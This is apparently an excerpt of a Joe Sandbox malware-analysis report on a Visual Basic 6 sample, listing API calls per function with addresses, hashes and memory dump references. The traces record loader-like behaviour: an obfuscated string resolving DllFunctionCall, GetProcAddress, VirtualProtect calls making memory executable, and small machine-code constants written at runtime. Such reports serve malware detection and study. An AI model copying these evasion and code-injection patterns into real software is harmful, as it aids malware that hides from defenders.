                                                                    • __vbaStrCat.MSVBVM60(0040A250,00000000,0040A248,00000000,0040A240,0040A238,?,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B109
                                                                    • __vbaStrMove.MSVBVM60(0040A250,00000000,0040A248,00000000,0040A240,0040A238,?,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B113
                                                                    • __vbaStrCat.MSVBVM60(0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238,?,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B11E
                                                                    • __vbaStrMove.MSVBVM60(0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238,?,?,?,0040A218,00000000,0040A208,0040A1FC), ref: 0054B128
                                                                    • __vbaStrCat.MSVBVM60(0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238,?,?,?,0040A218,00000000,0040A208), ref: 0054B133
                                                                    • __vbaStrMove.MSVBVM60(0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238,?,?,?,0040A218,00000000,0040A208), ref: 0054B13D
                                                                    • __vbaStrCat.MSVBVM60(0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238,?,?,?,0040A218), ref: 0054B148
                                                                    • __vbaStrMove.MSVBVM60(0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238,?,?,?,0040A218), ref: 0054B152
                                                                    • __vbaStrCat.MSVBVM60(0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238), ref: 0054B15D
                                                                    • __vbaStrMove.MSVBVM60(0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238), ref: 0054B167
                                                                    • __vbaStrCat.MSVBVM60(0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238), ref: 0054B172
                                                                    • __vbaStrMove.MSVBVM60(0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000,0040A240,0040A238), ref: 0054B17C
                                                                    • __vbaStrCat.MSVBVM60(0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000), ref: 0054B187
                                                                    • __vbaStrMove.MSVBVM60(0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000,0040A248,00000000), ref: 0054B191
                                                                    • __vbaStrCat.MSVBVM60(0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000), ref: 0054B19C
                                                                    • __vbaStrMove.MSVBVM60(0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000,0040A250,00000000), ref: 0054B1A6
                                                                    • __vbaStrCat.MSVBVM60(0040A280,00000000,0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000), ref: 0054B1B1
                                                                    • __vbaStrMove.MSVBVM60(0040A280,00000000,0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000), ref: 0054B1BB
                                                                    • __vbaStrCat.MSVBVM60(0040A288,00000000,0040A280,00000000,0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000), ref: 0054B1C6
                                                                    • __vbaStrMove.MSVBVM60(0040A288,00000000,0040A280,00000000,0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000), ref: 0054B1D0
                                                                    • __vbaStrCat.MSVBVM60(0040A250,00000000,0040A288,00000000,0040A280,00000000,0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000), ref: 0054B1DB
                                                                    • __vbaStrMove.MSVBVM60(0040A250,00000000,0040A288,00000000,0040A280,00000000,0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000,0040A268,00000000), ref: 0054B1E5
                                                                    • __vbaStrToAnsi.MSVBVM60(00000000,00000000,0040A250,00000000,0040A288,00000000,0040A280,00000000,0040A250,00000000,0040A278,00000000,0040A248,00000000,0040A270,00000000), ref: 0054B1EF
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 0054B1FB
                                                                    • __vbaFreeStrList.MSVBVM60(0000000E,00000000,0040A218,?,?,?,0040A238,0040A240,00000000,0040A248,00000000,0040A250,00000000,0040A258,00000000,00000000), ref: 0054B23F
                                                                    • __vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000,0040A258,00000000), ref: 0054B25A
                                                                    • __vbaNew.MSVBVM60(0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000,0040A270,00000000,0040A268,00000000,0040A260,00000000), ref: 0054B26C
                                                                    • __vbaObjSet.MSVBVM60(0040A260,00000000,0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000,0040A270,00000000,0040A268,00000000), ref: 0054B276
                                                                    • __vbaCastObj.MSVBVM60(00000000,0040A260,00000000,0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000,0040A270,00000000,0040A268), ref: 0054B27C
                                                                    • __vbaObjSet.MSVBVM60(00000000,00000000,00000000,0040A260,00000000,0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000,0040A270), ref: 0054B286
                                                                    • __vbaObjSetAddref.MSVBVM60(00000000,00000000,00000000,00000000,0040A260,00000000,0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000), ref: 0054B292
                                                                    • __vbaFreeObjList.MSVBVM60(00000002,0040A260,00000000,00000000,00000000,00000000,00000000,0040A260,00000000,0040A2AC,0040A2BC), ref: 0054B2A1
                                                                    • __vbaObjSetAddref.MSVBVM60(0040A260,0057F2D0,00000000,0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000,0040A270,00000000,0040A268), ref: 0054B2B4
                                                                    • #644.MSVBVM60(00000000,0040A260,0057F2D0,00000000,0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000,0040A270,00000000), ref: 0054B2BA
                                                                    • __vbaFreeObj.MSVBVM60(00000000,0040A260,0057F2D0,00000000,0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000,0040A270,00000000), ref: 0054B2C5
                                                                    • #644.MSVBVM60(0040A1FC,00000000,0040A260,0057F2D0,00000000,0040A2AC,0040A2BC,?,?,?,?,?,?,?,00000000,0040A270), ref: 0054B2CE
                                                                    • __vbaAryLock.MSVBVM60(0040A208,?,?,0040A1FC,00000000), ref: 0054B31E
                                                                    • #644.MSVBVM60(0000000C,0040A208,?,?,0040A1FC,00000000), ref: 0054B336
                                                                    • __vbaAryUnlock.MSVBVM60(0040A208,0000000C,0040A208,?,?,0040A1FC,00000000), ref: 0054B345
                                                                    • __vbaObjSetAddref.MSVBVM60(0040A260,0057F2D0,?,0040A1FC,00000000), ref: 0054B36C
                                                                    • #644.MSVBVM60(00000000,0040A260,0057F2D0,?,0040A1FC,00000000), ref: 0054B372
                                                                    • __vbaFreeObj.MSVBVM60(00000000,0040A260,0057F2D0,?,0040A1FC,00000000), ref: 0054B37D
                                                                    • #644.MSVBVM60(0057F2CC,00000000,0040A260,0057F2D0,?,0040A1FC,00000000), ref: 0054B38B
                                                                    • __vbaAryLock.MSVBVM60(0040A208,?,00000000,0040A1FC,00000004,0057F2CC,00000000,0040A260,0057F2D0,?,0040A1FC,00000000), ref: 0054B3AD
                                                                    • #644.MSVBVM60(0000000C,0040A208,?,00000000,0040A1FC,00000004,0057F2CC,00000000,0040A260,0057F2D0,?,0040A1FC,00000000), ref: 0054B3C4
                                                                    • __vbaAryUnlock.MSVBVM60(0040A208,0000000C,0040A208,?,00000000,0040A1FC,00000004,0057F2CC,00000000,0040A260,0057F2D0,?,0040A1FC,00000000), ref: 0054B3D3
                                                                    • #644.MSVBVM60(0057F2D0,0040A208,0000000C,0040A208,?,00000000,0040A1FC,00000004,0057F2CC,00000000,0040A260,0057F2D0,?,0040A1FC,00000000), ref: 0054B3EB
                                                                    • __vbaRedim.MSVBVM60(00000080,00000004,0057F214,00000003,00000001,00000010,00000000,0040A260,0040A1FC,0057F2D0,0040A208,0000000C,0040A208,?,00000000,0040A1FC), ref: 0054B430
                                                                    • #644.MSVBVM60(?,?,0040A1FC,00000000), ref: 0054B43C
                                                                    • #644.MSVBVM60(00000040,-0000000C,00000000,?,?,0040A1FC,00000000), ref: 0054B465
                                                                    • __vbaAryLock.MSVBVM60(0040A208,0057F2D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A1FC,00000000), ref: 0054B499
                                                                    • __vbaStrCat.MSVBVM60(0040A2E4,0040A2DC,0000000C,00000000,0040A208,0057F2D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A1FC,00000000), ref: 0054B4C1
                                                                    • __vbaStrMove.MSVBVM60(0040A2E4,0040A2DC,0000000C,00000000,0040A208,0057F2D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A1FC,00000000), ref: 0054B4CB
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040A2E4,0040A2DC,0000000C,00000000,0040A208,0057F2D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A1FC,00000000), ref: 0054B4D1
                                                                    • VirtualProtect.KERNELBASE(00000000,00000000,00000000,0040A2E4,0040A2DC,0000000C,00000000,0040A208,0057F2D0,-0000000C,00000040,-0000000C,00000000,?,?,0040A1FC), ref: 0054B4E9
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,0057F2D0,0040A2BC,0000002C), ref: 0054B511
                                                                    • __vbaAryUnlock.MSVBVM60(0040A208), ref: 0054B529
                                                                    • __vbaFreeStr.MSVBVM60(0040A208), ref: 0054B531
                                                                    • #644.MSVBVM60(?,0040A208), ref: 0054B53A
                                                                    • __vbaAryLock.MSVBVM60(0040A208,00000000,00000000,-0000000C,?,0040A208), ref: 0054B5A4
                                                                    • #644.MSVBVM60(0000000C,0040A208,00000000,00000000,-0000000C,?,0040A208), ref: 0054B5BC
                                                                    • __vbaAryUnlock.MSVBVM60(0040A208,0000000C,0040A208,00000000,00000000,-0000000C,?,0040A208), ref: 0054B5CB
                                                                    • #644.MSVBVM60(0424448B,00000000,00000000,-0000000C,?,0040A208), ref: 0054B5F9
                                                                    • #644.MSVBVM60(408B008B,0057F2D0,0040A1F8,0424448B,00000000,00000000,-0000000C,?,0040A208), ref: 0054B627
                                                                    • #644.MSVBVM60(20C4832C,0057F2D0,0040A1F4,408B008B,0057F2D0,0040A1F8,0424448B,00000000,00000000,-0000000C,?,0040A208), ref: 0054B655
                                                                    • #644.MSVBVM60(E02474FF,0057F2D0,0040A1F0,20C4832C,0057F2D0,0040A1F4,408B008B,0057F2D0,0040A1F8,0424448B,00000000,00000000,-0000000C,?,0040A208), ref: 0054B683
                                                                    • #644.MSVBVM60(0000E0FF,0057F2D0,0040A1EC,E02474FF,0057F2D0,0040A1F0,20C4832C,0057F2D0,0040A1F4,408B008B,0057F2D0,0040A1F8,0424448B,00000000,00000000,-0000000C), ref: 0054B6B1
                                                                    • VirtualProtect.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000040,00000000,0057F2D0,0040A1E8,0000E0FF,0057F2D0,0040A1EC,E02474FF), ref: 0054B71D
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,0057F2D0,0040A2BC,00000020), ref: 0054B745
                                                                    • __vbaAryLock.MSVBVM60(0040A208,00000000), ref: 0054B7A0
                                                                    • #644.MSVBVM60(0000000C,0040A208,00000000), ref: 0054B7B8
                                                                    • __vbaAryUnlock.MSVBVM60(0040A208,0000000C,0040A208,00000000), ref: 0054B7C7
                                                                    • #644.MSVBVM60(0057F2CC,00000000), ref: 0054B7ED
                                                                    • #644.MSVBVM60(0000E0FF,0040A1FC,0057F2CC,00000000), ref: 0054B80C
                                                                    • #644.MSVBVM60(00000000,00000000,0000E0FF,0040A1FC,0057F2CC,00000000), ref: 0054B82C
                                                                    • __vbaFreeVar.MSVBVM60(00000000,-00000004,00000000,00000000,00000000,0000E0FF,0040A1FC,0057F2CC,00000000), ref: 0054B84C
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054B8D7,00000000,-00000004,00000000,00000000,00000000,0000E0FF,0040A1FC,0057F2CC,00000000), ref: 0054B8D1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644$Move$Free$List$LockUnlock$Chkstk$Addref$AddressAnsiCheckHandleHresultModuleProcProtectRedimVirtual$#632#653CastDestruct
                                                                    • String ID: @$DqlqlqFquqnqcqtqiqoqnqCqaqlqlq$bvm
                                                                    • API String ID: 4157516495-683613472
                                                                    • Opcode ID: 92aa114b58db18d5145934bd0a1cab13d4fe2211b4014a62d4f8a863d13a2b91
                                                                    • Instruction ID: 2f1f8c6d587148cfc0f55deb6c67f51440d76f509c759478130c6098f3c3dfbd
                                                                    • Opcode Fuzzy Hash: 92aa114b58db18d5145934bd0a1cab13d4fe2211b4014a62d4f8a863d13a2b91
                                                                    • Instruction Fuzzy Hash: 70423171D40209AFDB04EBA5CC46FDE77B9BF08304F10416AF605FB1A2DA399A449F65

                                                                    Control-flow Graph

                                                                    [Figure: control-flow graph of the function starting at 54c6e3; blocks are marked Executed or Not Executed]
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054C700
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401006), ref: 0054C719
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054C756
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0054C784
                                                                      • Part of subcall function 0054E57D: __vbaChkstk.MSVBVM60(?,00401006), ref: 0054E599
                                                                      • Part of subcall function 0054E57D: __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401006), ref: 0054E5B2
                                                                      • Part of subcall function 0054E57D: __vbaVarMove.MSVBVM60 ref: 0054E5D1
                                                                      • Part of subcall function 0054E57D: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054E603
                                                                      • Part of subcall function 0054E57D: __vbaVarCmpGt.MSVBVM60(?,0057F2C0,00008003,0000000B), ref: 0054E64F
                                                                      • Part of subcall function 0054E57D: __vbaVarOr.MSVBVM60(?,00000000,?,0057F2C0,00008003,0000000B), ref: 0054E659
                                                                      • Part of subcall function 0054E57D: __vbaBoolVarNull.MSVBVM60(00000000,?,00000000,?,0057F2C0,00008003,0000000B), ref: 0054E65F
                                                                      • Part of subcall function 0054E57D: __vbaFreeVar.MSVBVM60(00000000,?,00000000,?,0057F2C0,00008003,0000000B), ref: 0054E66B
                                                                      • Part of subcall function 0054E57D: __vbaFreeObj.MSVBVM60(0054E767,?,00006011,?), ref: 0054E761
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000000,?,?), ref: 0054C797
                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000,?,?), ref: 0054C7A1
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00000000,?,?), ref: 0054C7B1
                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,?,?), ref: 0054C7B9
                                                                    • __vbaFreeObj.MSVBVM60(?,?,00000000,?,?), ref: 0054C7C1
                                                                    • __vbaFreeVar.MSVBVM60(?,?,00000000,?,?), ref: 0054C7C9
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?,?,?,00000000,?,?), ref: 0054C7D5
                                                                      • Part of subcall function 0054E57D: __vbaRedim.MSVBVM60(00000080,00000001,0057F220,00000011,00000001,-00000001,00000000,00000000,?,00000000,?,0057F2C0,00008003,0000000B), ref: 0054E694
                                                                      • Part of subcall function 0054E57D: __vbaAryLock.MSVBVM60(?), ref: 0054E6A6
                                                                      • Part of subcall function 0054E57D: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054E6E6
                                                                      • Part of subcall function 0054E57D: __vbaAryUnlock.MSVBVM60(?), ref: 0054E6FE
                                                                      • Part of subcall function 0054E57D: __vbaVarMove.MSVBVM60(?,00006011,?), ref: 0054E724
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054C7E8
                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054C7F2
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054C802
                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054C80A
                                                                    • __vbaFreeObj.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054C812
                                                                    • __vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054C81A
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054C852
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054C899
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054C8E0
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0054C8FB
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?), ref: 0054C90B
                                                                    • __vbaStrCopy.MSVBVM60(00000000,?,?), ref: 0054C91B
                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,?), ref: 0054C923
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,?), ref: 0054C92B
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?,00000000,?,?), ref: 0054C937
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000000,?,?), ref: 0054C947
                                                                    • __vbaStrCopy.MSVBVM60(00000000,?,?,00000000,?,?), ref: 0054C957
                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,?,00000000,?,?), ref: 0054C95F
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,?,00000000,?,?), ref: 0054C967
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?,00000000,?,?,00000000,?,?), ref: 0054C973
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 0054C983
                                                                    • __vbaStrCopy.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 0054C993
                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 0054C99B
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 0054C9A3
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054C9DB
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054CA22
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054CA69
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054CAAA
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 0054CAD4
                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0054CAE3
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054CB23
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054CBD0
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,0FFFFFFF,00000000), ref: 0054CC11
                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0054CC20
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054CC60
                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0054CC78
                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0054CB3B
                                                                      • Part of subcall function 0054D6DB: __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D6F6
                                                                      • Part of subcall function 0054D6DB: __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D70E
                                                                      • Part of subcall function 0054D6DB: __vbaStrVarCopy.MSVBVM60(00000000,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D714
                                                                      • Part of subcall function 0054D6DB: __vbaStrMove.MSVBVM60(00000000,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D71E
                                                                      • Part of subcall function 0054D6DB: __vbaNew2.MSVBVM60(00407D80,00000000,00000000,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D751
                                                                      • Part of subcall function 0054D6DB: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A318,0000001C,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF), ref: 0054D793
                                                                      • Part of subcall function 0054D6DB: __vbaStrToAnsi.MSVBVM60(?,00004008,00000018,00000000,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF), ref: 0054D7AC
                                                                      • Part of subcall function 0054D6DB: __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00004008,00000018,00000000,?,?,?,?,00401006,?,?,?,0054CCAF), ref: 0054D7C0
                                                                      • Part of subcall function 0054D6DB: __vbaFreeStrList.MSVBVM60(00000002,00004008,?,?,00000000,00000000,?,00004008,00000018,00000000,?,?,?,?,00401006), ref: 0054D7DE
                                                                      • Part of subcall function 0054D6DB: __vbaNew2.MSVBVM60(00407D80,00000000), ref: 0054D801
                                                                    • __vbaAryUnlock.MSVBVM60(?,0054D375,?,00000000,?,?,?,?,?,?,?), ref: 0054D341
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,?,0054D375,?,00000000,?,?,?,?,?,?,?), ref: 0054D34C
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,?,0054D375,?,00000000,?,?,?,?,?,?,?), ref: 0054D354
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,?,0054D375,?,00000000,?,?,?,?,?,?,?), ref: 0054D35C
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00000000,?,?,0054D375,?,00000000,?,?,?,?,?,?,?), ref: 0054D367
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00000000,?,?,0054D375,?,00000000,?,?,?,?,?,?,?), ref: 0054D36F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmp
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$CheckHresult$Move$Addref$Copy$Unlock$ChkstkLockRedim$DestructNew2$AnsiBoolErrorListNofreeNullSystemVarg
                                                                    • String ID:
                                                                    • API String ID: 734032644-0
                                                                    • Opcode ID: 40186bcbe77b824b9ac69038f50abfa0925ebe3356a1c456c2a2d8ab25a56edb
                                                                    • Instruction ID: da34fe79ffe0922f3e2226472eab5ba6b4a307db05ca8844860cdd66e083533b
                                                                    • Opcode Fuzzy Hash: 40186bcbe77b824b9ac69038f50abfa0925ebe3356a1c456c2a2d8ab25a56edb
                                                                    • Instruction Fuzzy Hash: B892D271D00219AFDF14EBA5DC45FEDBBB9BF08304F10846AE215BB1A2DB7999448F14

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0054BAB4,?,?,?), ref: 0054E7A0
                                                                    • __vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,?,00000003,?,00000000,00401006,?,?,?,0054BAB4), ref: 0054E7C5
                                                                    • __vbaNew.MSVBVM60(0040A2AC,0040A2BC), ref: 0054E7D7
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,0040A2AC,0040A2BC), ref: 0054E7E1
                                                                    • __vbaCastObj.MSVBVM60(00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E7E7
                                                                    • __vbaObjSet.MSVBVM60(0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E7F1
                                                                    • __vbaFreeObj.MSVBVM60(0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E7F9
                                                                    • __vbaObjSetAddref.MSVBVM60(00000000,0040A2AC,0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E805
                                                                    • #644.MSVBVM60(00000000,00000000,0040A2AC,0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E80B
                                                                    • __vbaFreeObj.MSVBVM60(00000000,00000000,0040A2AC,0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E816
                                                                    • #644.MSVBVM60(0040A2BC,00000000,00000000,0040A2AC,0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E81F
                                                                    • #644.MSVBVM60(?,0040A2BC,00000000,00000000,0040A2AC,0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E82B
                                                                    • #644.MSVBVM60(0040A2BC,?,0040A2BC,00000000,00000000,0040A2AC,0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E837
                                                                    • #644.MSVBVM60(0040A2BC,0040A2BC,?,0040A2BC,00000000,00000000,0040A2AC,0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E843
                                                                    • __vbaAryLock.MSVBVM60(?,?,?), ref: 0054E887
                                                                    • #644.MSVBVM60(?,?,?,?), ref: 0054E89F
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?), ref: 0054E8AB
                                                                    • __vbaObjSetAddref.MSVBVM60(00000000,0040A2AC,?), ref: 0054E8CB
                                                                    • #644.MSVBVM60(00000000,00000000,0040A2AC,?), ref: 0054E8D1
                                                                    • __vbaFreeObj.MSVBVM60(00000000,00000000,0040A2AC,?), ref: 0054E8DC
                                                                    • #644.MSVBVM60(?,00000000,00000000,0040A2AC,?), ref: 0054E8E5
                                                                    • __vbaAryLock.MSVBVM60(?,?,0040A2BC,00000000,?,00000000,00000000,0040A2AC,?), ref: 0054E8FA
                                                                    • #644.MSVBVM60(?,?,?,0040A2BC,00000000,?,00000000,00000000,0040A2AC,?), ref: 0054E911
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,0040A2BC,00000000,?,00000000,00000000,0040A2AC,?), ref: 0054E91D
                                                                    • #644.MSVBVM60(0040A2BC,?,?,?,?,0040A2BC,00000000,?,00000000,00000000,0040A2AC,?), ref: 0054E92C
                                                                    • #644.MSVBVM60(0057F2B0,0040A2BC,0040A2BC,0040A2BC,?,?,?,?,0040A2BC,00000000,?,00000000,00000000,0040A2AC,?), ref: 0054E965
                                                                    • #644.MSVBVM60(00000040,-0000000C,00000000,0057F2B0,0040A2BC,0040A2BC,0040A2BC,?,?,?,?,0040A2BC,00000000,?,00000000,00000000), ref: 0054E988
                                                                    • __vbaAryLock.MSVBVM60(?,0040A2BC,-0000000C,00000040,-0000000C,00000000,0057F2B0,0040A2BC,0040A2BC,0040A2BC,?,?,?,?,0040A2BC,00000000), ref: 0054E9B3
